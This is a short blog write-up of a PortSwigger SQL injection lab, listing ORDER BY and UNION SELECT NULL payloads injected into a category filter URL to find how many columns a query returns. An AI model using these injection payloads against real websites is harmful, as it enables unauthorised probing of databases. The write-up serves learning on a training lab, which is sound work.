Home πŸ•ΈοΈ PSA - SQLi 3 - UNION attack, determining the number of columns returned by the query
Post
Cancel

πŸ•ΈοΈ PSA - SQLi 3 - UNION attack, determining the number of columns returned by the query

Posted Mar 2, 2023 Updated Sep 28, 2024
By blueh0rse
1 min read

Difficulty : Practitioner

🎯 Goal

To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.

βœ… Solution

Initial request:

1

<website>/products?category=Gifts

Now we can use 2 technics to determine the number of rows returned:

Method 1 - ORDER BY

1
2
3
4

<website>/filter?category=Gifts' ORDER BY 1--    # works
<website>/filter?category=Gifts' ORDER BY 2--    # works
<website>/filter?category=Gifts' ORDER BY 3--    # works
<website>/filter?category=Gifts' ORDER BY 4--    # error!

So we know 3 columns are returned.

Method 2 - UNION SELECT NULL

1
2
3
4

<website>/filter?category=Gifts' UNION SELECT NULL--    # works
<website>/filter?category=Gifts' UNION SELECT NULL,NULL--    # works
<website>/filter?category=Gifts' UNION SELECT NULL,NULL,NULL--    # works
<website>/filter?category=Gifts' UNION SELECT NULL,NULL,NULL,NULL--    # error!

Same result: 3 columns are returned.

PortSwigger, SQLi
portswigger web sqli
This post is licensed under GNU GPLv3 by the author.
Recently Updated
Contents